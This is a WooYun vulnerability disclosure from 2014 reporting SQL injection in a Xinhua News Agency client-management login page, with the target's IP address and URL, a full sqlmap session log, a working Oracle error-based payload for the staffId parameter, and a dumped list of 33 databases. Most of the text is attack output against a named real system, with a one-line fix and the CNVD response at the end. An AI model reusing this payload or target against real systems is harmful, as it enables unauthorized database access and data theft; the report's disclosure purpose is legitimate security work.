当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087690

漏洞标题:新华社党政企客户端集中管控SQL注射

相关厂商:新华社

漏洞作者: 影刺

提交时间:2014-12-23 12:33

修复时间:2015-02-06 12:34

公开时间:2015-02-06 12:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-23: 细节已通知厂商并且等待厂商处理中
2014-12-26: 厂商已经确认,细节仅向厂商公开
2015-01-05: 细节向核心白帽子及相关领域专家公开
2015-01-15: 细节向普通白帽子公开
2015-01-25: 细节向实习白帽子公开
2015-02-06: 细节向公众公开

简要描述:

详细说明:

新华社党政企客户端集中管控SQL注射 Oracle库。
存在sql漏洞注入URL:http://203.192.12.73/Login!input.action

[15:30:25] [INFO] parsing HTTP request from 'c:\cc.txt'
[15:30:26] [WARNING] it appears that you have provided tainted parameter values ('staffId='or'%3D'or'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you sure you want to continue? [y/N] y
[15:30:27] [WARNING] it appears that you have provided tainted parameter values ('password=1''%3D'232'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you sure you want to continue? [y/N] y
[15:30:28] [INFO] testing connection to the target URL
[15:30:29] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[15:30:29] [INFO] testing if the target URL is stable. This can take a couple of seconds
[15:30:31] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[15:30:33] [INFO] testing if POST parameter 'staffId' is dynamic
[15:30:35] [INFO] confirming that POST parameter 'staffId' is dynamic
[15:30:35] [INFO] POST parameter 'staffId' is dynamic
[15:30:36] [INFO] heuristic (basic) test shows that POST parameter 'staffId' might be injectable (possible DBMS: 'Oracle')
[15:30:36] [INFO] testing for SQL injection on POST parameter 'staffId'
do you want to include all tests for 'Oracle' extending provided level (1) and risk (1)? [Y/n] y
[15:30:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:30:51] [INFO] testing 'Oracle boolean-based blind - Parameter replace (original value)'
[15:31:02] [INFO] testing 'Oracle boolean-based blind - GROUP BY and ORDER BY clauses'
[15:31:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:31:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[15:31:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[15:31:16] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[15:31:17] [INFO] POST parameter 'staffId' is 'Oracle OR error-based - WHERE or HAVING clause (XMLType)' injectable
[15:31:17] [INFO] testing 'Oracle inline queries'
[15:31:17] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)'
[15:31:17] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[15:31:17] [INFO] testing 'Oracle stacked queries (heavy query)'
[15:31:18] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP)'
[15:31:19] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP)'
[15:31:19] [INFO] testing 'Oracle AND time-based blind'
[15:31:20] [INFO] testing 'Oracle AND time-based blind (comment)'
[15:31:21] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[15:31:21] [INFO] testing 'Oracle AND time-based blind (heavy query - comment)'
[15:31:21] [INFO] testing 'Oracle OR time-based blind'
[15:31:22] [INFO] testing 'Oracle OR time-based blind (heavy query)'
[15:32:22] [INFO] POST parameter 'staffId' seems to be 'Oracle OR time-based blind (heavy query)' injectable
[15:32:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:32:22] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
POST parameter 'staffId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 77 HTTP(s) requests:
---
Place: POST
Parameter: staffId
Type: error-based
Title: Oracle OR error-based - WHERE or HAVING clause (XMLType)
Payload: staffId=-9760') OR 4162=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(110)||CHR(112)||CHR(115)||CHR(113)||(SELECT (CASE WHEN (4162=4162) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(114)||CHR(99)||CHR(101)||CHR(113)||CHR(62))) FROM DUAL) AND ('RwMs'='RwMs&password=1''='232'
Type: AND/OR time-based blind
Title: Oracle OR time-based blind (heavy query)


新华.jpg


新华2.jpg


available databases [33]:
[*] BONC
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GOV_CLIENT
[*] GOV_CLIENT_BK
[*] GOV_CLIENT_DIM
[*] GOV_CLIENT_TEST
[*] HESPER
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XH_DIM
[*] XH_DM
[*] XH_DWA
[*] XH_DWD
[*] XH_ODS
[*] XH_STAGE
[*] XH_TEST


33个数据库

漏洞证明:

新华.jpg


新华2.jpg


available databases [33]:
[*] BONC
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GOV_CLIENT
[*] GOV_CLIENT_BK
[*] GOV_CLIENT_DIM
[*] GOV_CLIENT_TEST
[*] HESPER
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XH_DIM
[*] XH_DM
[*] XH_DWA
[*] XH_DWD
[*] XH_ODS
[*] XH_STAGE
[*] XH_TEST


33个数据库

修复方案:

过滤staffId参数。

版权声明:转载请注明来源 影刺@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-12-26 15:39

厂商回复:

CNVD确认所述漏洞情况,已经由CNVD通过以往建立的处置渠道向网站管理单位通报

最新状态:

暂无